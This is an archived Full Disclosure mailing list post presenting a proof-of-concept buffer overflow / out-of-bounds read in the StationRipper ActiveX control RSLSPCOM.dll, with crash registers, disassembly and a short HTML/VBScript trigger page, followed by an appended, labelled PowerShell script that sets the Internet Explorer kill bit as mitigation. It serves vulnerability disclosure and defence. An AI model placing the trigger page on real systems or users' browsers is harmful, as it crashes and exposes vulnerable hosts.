Full Disclosure mailing list archives

stationripper ActiveX (RSLSPCOM.dll) BoF PoC


From: kaveh ghaemmaghami <kavehghaemmaghami () googlemail com>
Date: Thu, 19 Jul 2012 11:22:57 -0700

Exploit Title: stationripper ActiveX (RSLSPCOM.dll) BoF PoC
Date: July 19, 2012
Author: coolkaveh
coolkaveh () rocketmail com
https://twitter.com/coolkaveh
Vendor Homepage: www.stationripper.com
Version: 2.98.3/1
Tested on: Windows XP SP3

---------------------------------------------------------------------------------------
cheers to awesome hippie flaw hunter
---------------------------------------------------------------------------------------
Class SSLDataContainer
GUID: {E52990C2-7CED-4756-9B3B-6188A5B41704}
GetDataAt
Function GetDataAt (
        ByVal lPos  As Long ,
        ByVal lHowMuch  As Long
)  As String

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EIP 003B1191
EAX 00000000
EBX 003BB3BC -> 003B3904
ECX 003D2120 -> BAADF00D
EDX 00000000
EDI FFFFFFFF
ESI 00000000
EBP 0013EDA4 -> 0013EDCC
ESP 0013ED64 -> 003BB3BC


Block Disassembly:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3B1181  MOV DL,AL
3B1183  AND DL,F
3B1186  SHL DL,2
3B1189  OR [EBP+13],DL
3B118C  SHR AL,4
3B118F  MOV DL,AL
3B1191  MOV AL,[EDI]      <--- CRASH
3B1193  MOV BL,AL
3B1195  AND BL,3
3B1198  SHL BL,4
3B119B  OR DL,BL
3B119D  SHR AL,2
3B11A0  MOV [EBP+F],AL
3B11A3  MOV EAX,[EBP-4]
3B11A6  SUB [EBP-8],EAX


ArgDump:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EBP+8   003D2120 -> BAADF00D
EBP+12  FFFFFFFF
EBP+16  00000001
EBP+20  00000005
EBP+24  00000001
EBP+28  00000000

<html>
Exploit
<object classid='clsid:E52990C2-7CED-4756-9B3B-6188A5B41704' id='xpl' ></object>
<script language='vbscript'>
' Fuzzer-template variables describing the target; not used by the call below
targetFile = "C:\Program Files\Ratajik Software\StationRipper\RSLSPCOM.dll"
prototype  = "Function GetDataAt ( ByVal lPos As Long ,  ByVal lHowMuch As Long ) As String"
memberName = "GetDataAt"
progid     = "SSLHIJACKCLIENTCOMLib.SSLDataContainer"
argCount   = 2

arg1=-1   ' lPos: negative offset is not validated; ends up in EDI (FFFFFFFF) and is dereferenced at MOV AL,[EDI]
arg2=1    ' lHowMuch

' Trigger the out-of-bounds read in RSLSPCOM.dll
xpl.GetDataAt arg1 ,arg2

</script>
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
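Defensive follow-up, added here as an example and not part of the original post: the standard host-side mitigation for a vulnerable ActiveX control is to set its Internet Explorer kill bit, i.e. the DWORD "Compatibility Flags" = 0x400 under the "ActiveX Compatibility" key for the CLSID quoted above (Microsoft KB240797), so that IE refuses to instantiate the control from web content. The PowerShell below sets that bit for {E52990C2-7CED-4756-9B3B-6188A5B41704} without clobbering other flags and verifies the result. The registry paths and the flag value are Microsoft's documented ones; on 64-bit Windows the 32-bit IE process reads the Wow6432Node view, so the script writes both. The script name and messages are my own.

```powershell
# Added example, not from the advisory: set the IE ActiveX kill bit for the
# StationRipper SSLDataContainer control. Run from an elevated prompt.
$clsid       = '{E52990C2-7CED-4756-9B3B-6188A5B41704}'
$killBitFlag = 0x400   # COMPAT_EVIL_DONT_LOAD, per Microsoft KB240797

$paths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)
# On 64-bit Windows, 32-bit IE consults the Wow6432Node view as well.
if ([Environment]::Is64BitOperatingSystem) {
    $paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
}

foreach ($path in $paths) {
    if (-not (Test-Path $path)) {
        New-Item -Path $path -Force | Out-Null
    }

    # Preserve any compatibility bits an administrator or vendor already set.
    $current = (Get-ItemProperty -Path $path -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    $new = $current -bor $killBitFlag

    Set-ItemProperty -Path $path -Name 'Compatibility Flags' -Value $new -Type DWord

    # Read back and confirm the kill bit is present.
    $verify = (Get-ItemProperty -Path $path -Name 'Compatibility Flags').'Compatibility Flags'
    if (($verify -band $killBitFlag) -eq $killBitFlag) {
        Write-Output ("Kill bit set for {0} under {1} (Compatibility Flags = 0x{2:X})" -f $clsid, $path, $verify)
    } else {
        Write-Error "Failed to set kill bit under $path"
    }
}
```

The kill bit only stops instantiation from Internet Explorer and other hosts that honour the ActiveX Compatibility key; it does not patch RSLSPCOM.dll, so the StationRipper application itself still loads the control. Removing the product, or an upstream fix that bounds-checks lPos before the read, is the complete remedy.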
